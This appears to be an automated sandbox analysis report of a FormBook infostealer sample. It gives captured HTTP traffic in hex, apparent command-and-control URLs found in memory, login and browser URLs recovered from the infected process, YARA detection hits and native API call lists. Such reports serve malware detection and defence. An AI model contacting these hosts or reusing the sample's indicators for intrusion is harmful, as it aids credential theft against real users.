e0 f8 df 8f 9d be b1 a7 42 e5 ac f3 27 87 d1 18 d5 4a eb c3 6b 17 36 ba 70 a1 46 21 9e 0d ce 9b f6 b5 35 3d 5a af d1 ed 29 dd 73 19 f2 df 76 b4 67 c9 ac 49 90 80 8f 38 b2 a6 30 de 1d bd 2e 3b ea cc 05 08 28 cf c0 6b de d8 23 08 cf 26 93 c0 c5 80 3c 91 c8 3b ec b4 47 d0 0e 4c ef 75 ab 3f a2 82 51 fb fa 1c 2a b7 f9 a3 91 ce c3 c5 8b ef c1 f1 de 47 09 db 28 62 1c 28 d4 de f7 2e 0b c3 bd 91 ce c7 ef 78 63 55 6f d1 b9 30 f8 76 2e 74 68 42 a0 f4 6c 62 41 d8 ad e4 eb 7b f8 09 1e fe ed 97 4f f7 ff f7 fe 33 3c fc d7 fb bf b9 ff bf 40 c1 51 c5 1f 53 3f df ff cd 9f ff ef fd e7 87 9f e0 fe 7f 3c fc 74 ff 97 f7 9f 1f fe 2b dc ff e5 2f 9f ee ff 0a fe fc df ef 3f 3f fc 97 87 7f fb e5 d3 c3 cf f7 ff e3 fe 2f 7d e0 b1 f2 da f9 71 c3 c6 94 b2 41 0d 7e 09
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 3ec_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://tehranrizcomputer.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Sat, 04 May 2024 08:10:42 GMTData Raw: 35 65 64 63 0d 0a f4 ff 1b 66 23 ec 9e 95 da 7b a8 ca 80 39 69 f5 00 a8 ce c4 18 37 f4 c7 af 3f ff fe 2a 30 76 37 c4 3a ae e7 fb 7f b3 d4 fe d7 ac 73 bc d8 df 40 47 91 4a 2e 80 00 87 1a 28 97 12 79 48 e2 1e 1c b7 65 b7 bb db d2 e1 01 89 cb 22 24 92 60 00 b0 58 65 45 ef ff 39 59 78 b3 f7 1f a6 37 8d 9b b5 d4 d9 fd cb a6 d5 7b e7 f3 52 d9 1b ec da 96 a7 bb 91 84 60 76 ef ce 89 cb e1 47 90 19 86 20 0e e1 74 e1 af 74 d6 9f f1 e5 f4 d4 53 5e 26 35 52 4b 02 24 0f 68 e2 6e b6 bd 29 53 8d d4 80 66 94 be 24 8c bd 21 92 0e aa fb 3f 47 8d 99 a0 8f d9 10 7d 39 bf 06 b3 8f e5 e7 e9 aa 9a dd b0 dd 51 4b 1c a0 97 f0 ec 35 e8 aa f9 34 4b 64 87 fe 7f df b4 72 57 52 34 cd ee 96 37 b9 0f 6d da 4d 37 8e 23 e7 22 29 74 36 ba e6 05 ff 57 55 50 85 42 50 05 30 28 98 a0 40 30 a8 22 70 8e 40 a2 ef bb ef fd 5f bf 7e 15 d0 f0 03 82 a6 c1 b6 00 bb 77 17 04 c9 11 db 07 60 83 01 c7 d8 a6 bc 0b 75 72 92 e3 7b 64 38 32 ce 04 99 fb c0 3a b6 9c e5 66 0a 67 33 39 17 84 9b 06 32 2e 94 42 2d 63 66 d3 7e ff ae dd 4a 06 21 84 a1 12 f5 31 66 dd 1c ff 4d 40 c4 ba 04 69 f8 63 a4 6f 7e bb d3 9d de 70 20 22 3c 51 2f f9 cb a1 51 ef e7 e8 b8 1a 41 10 09 a1 be 1c 59 7f f7 6b d9 55 06 41 d4 bc c5 3c 86 5a 1d b7 c6 7f 4e 05 11 50 31 9a d1 c4 a7 12 f0 88 b3 c9 93 da b7 0d 1c 53 69 bf f5 8d bc d7 56 92 be 7c b3 b7 83 ed 73 f1 91 65 2d ad 43 bf 26 63 c0 9b 65 63 3a d9 e2 9a 28 4d 82 b0 c5 a3 a9 b7 ad 59 98 31 83 01 df b7 a3 ae 94 0d ae 05 e3 33 4d b0 66 d7 06 87 36 58 a3 2c 1a 5c 77 86 e0 e7 ae d1 dd 0d 58 6c d6 a4 b7 a6 d2 0d f6 ed be 91 9b b6 df 30 63 37 e1 ae ea 42 21 e0 36 a7 bb 4d 21 cb 9b e9 33 f3 58 5b d9 59 fd b1 34 6d 3f 78 b4 97 06 e0 f5 ec da c6 f6 25 eb eb 9e 9c 4d 26 41 10 3c 71 63 f9 b7 9d 9d 55 fd f6 bf bd 78 d9 f5 83 ff 2d fa da a8 41 f2 df df ce c3 97 5f 82 32 e5 d0 62 e7 d9 1f e7 fe d6 28 5c 78 ec 68 b5 c7 e3 23 9c 29 e0 f8 df 8f 9d be b1 a7 42 e5 ac f3 27 87 d1 18 d5 4a eb c3 6b 17 36 ba 70 a1 46 21 9e 0d ce 9b f6 b5 35 3d 5a af d1 ed 29 dd 73 19 f2 df 76 b4 67 c9 ac 49 90 80 8f 38 b2 a6 30 de 1d bd 2e 3b ea cc 05 08 28 cf c0 6b de d8 23 08 cf 26 93 c0 c5 80 3c 91 c8 3b ec b4 47 d0 0e 4c ef 75 ab 3f a2 82 51 fb fa 1c 2a b7 f9 a3 91 ce c3 c5 8b ef c1 f1 de 47 09 db 28 62 1c 28 d4 de f7 2e 0b c3 bd 91 ce c7 ef 78 63 55 6f d1 b9 30 f8 76 2e 74 68 42 a0 f4 6c 62 41 d8 ad e4 eb 7b f8 09 1e fe ed 97 4f f7 ff f7 fe 33 3c fc d7 fb bf b9 ff bf 40 c1 51 c5 1f 53 3f df ff cd 9f ff ef fd e7 87 9f e0 fe 7f 3c fc 74 ff 97 f7 9f 1f fe 2b dc ff e5 2f 9f ee ff 0a fe fc df ef 3f 3f fc 97 87 7f fb e5 d3 c3 cf f7 ff e3 fe 2f 7d e0 b1 f2 da f9 71 c3 c6 94 b2 41 0d 7e 09
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 04 May 2024 08:10:52 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 04 May 2024 08:10:55 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 04 May 2024 08:10:58 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: Doc 1Z881A080453968203.exe, 00000000.00000002.1414525368.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: cttune.exe, 0000000E.00000002.2603455875.0000000005AE6000.00000004.10000000.00040000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000F.00000002.2601998398.00000000033C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://tehranrizcomputer.com/gtit/?6t=MgfHm/AWJcZtJWhW2C0E/J
                Source: ShWVPkMdEfalHck.exe, 0000000F.00000002.2600975698.0000000000F63000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.coppercookwarekitchen.com
                Source: ShWVPkMdEfalHck.exe, 0000000F.00000002.2600975698.0000000000F63000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.coppercookwarekitchen.com/gtit/
                Source: cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cttune.exe, 0000000E.00000002.2600153010.00000000030FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: cttune.exe, 0000000E.00000002.2600153010.00000000030FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: cttune.exe, 0000000E.00000003.2236150618.0000000008235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: cttune.exe, 0000000E.00000002.2600153010.00000000030FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: cttune.exe, 0000000E.00000002.2600153010.00000000030FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: cttune.exe, 0000000E.00000002.2600153010.00000000030FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: cttune.exe, 0000000E.00000002.2600153010.00000000030FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.Doc 1Z881A080453968203.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Doc 1Z881A080453968203.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2600975698.0000000000F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2038647178.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2601515677.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2601810779.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2038799247.00000000025F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2601294723.0000000002DC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 7.2.Doc 1Z881A080453968203.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 7.2.Doc 1Z881A080453968203.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000F.00000002.2600975698.0000000000F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2038647178.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.2601515677.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.2601810779.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2038799247.00000000025F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000D.00000002.2601294723.0000000002DC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0042AEF3 NtClose,7_2_0042AEF3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762B60 NtClose,LdrInitializeThunk,7_2_01762B60
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_01762DF0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_01762C70
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017635C0 NtCreateMutant,LdrInitializeThunk,7_2_017635C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01764340 NtSetContextThread,7_2_01764340
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01764650 NtSuspendThread,7_2_01764650
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762BF0 NtAllocateVirtualMemory,7_2_01762BF0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762BE0 NtQueryValueKey,7_2_01762BE0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762BA0 NtEnumerateValueKey,7_2_01762BA0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762B80 NtQueryInformationFile,7_2_01762B80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762AF0 NtWriteFile,7_2_01762AF0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762AD0 NtReadFile,7_2_01762AD0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762AB0 NtWaitForSingleObject,7_2_01762AB0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762D30 NtUnmapViewOfSection,7_2_01762D30
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762D10 NtMapViewOfSection,7_2_01762D10
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762D00 NtSetInformationFile,7_2_01762D00
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762DD0 NtDelayExecution,7_2_01762DD0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762DB0 NtEnumerateKey,7_2_01762DB0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762C60 NtCreateKey,7_2_01762C60
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762C00 NtQueryInformationProcess,7_2_01762C00
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762CF0 NtOpenProcess,7_2_01762CF0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762CC0 NtQueryVirtualMemory,7_2_01762CC0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762CA0 NtQueryInformationToken,7_2_01762CA0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762F60 NtCreateProcessEx,7_2_01762F60
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762F30 NtCreateSection,7_2_01762F30
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762FE0 NtCreateFile,7_2_01762FE0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762FB0 NtResumeThread,7_2_01762FB0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762FA0 NtQuerySection,7_2_01762FA0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762F90 NtProtectVirtualMemory,7_2_01762F90
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762E30 NtWriteVirtualMemory,7_2_01762E30
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762EE0 NtQueueApcThread,7_2_01762EE0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762EA0 NtAdjustPrivilegesToken,7_2_01762EA0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01762E80 NtReadVirtualMemory,7_2_01762E80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01763010 NtOpenDirectoryObject,7_2_01763010
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01763090 NtSetValueKey,7_2_01763090
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017639B0 NtGetContextThread,7_2_017639B0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01763D70 NtOpenThread,7_2_01763D70
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01763D10 NtOpenProcessToken,7_2_01763D10
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB4650 NtSuspendThread,LdrInitializeThunk,14_2_04FB4650
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB4340 NtSetContextThread,LdrInitializeThunk,14_2_04FB4340
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_04FB2CA0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04FB2C70
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2C60 NtCreateKey,LdrInitializeThunk,14_2_04FB2C60
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_04FB2DF0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2DD0 NtDelayExecution,LdrInitializeThunk,14_2_04FB2DD0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2D30 NtUnmapViewOfSection,LdrInitializeThunk,14_2_04FB2D30
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2D10 NtMapViewOfSection,LdrInitializeThunk,14_2_04FB2D10
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2EE0 NtQueueApcThread,LdrInitializeThunk,14_2_04FB2EE0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2E80 NtReadVirtualMemory,LdrInitializeThunk,14_2_04FB2E80
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2FE0 NtCreateFile,LdrInitializeThunk,14_2_04FB2FE0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2FB0 NtResumeThread,LdrInitializeThunk,14_2_04FB2FB0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2F30 NtCreateSection,LdrInitializeThunk,14_2_04FB2F30
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04FB2AF0 NtWriteFile,LdrInitializeThunk,14_2_04FB2AF0
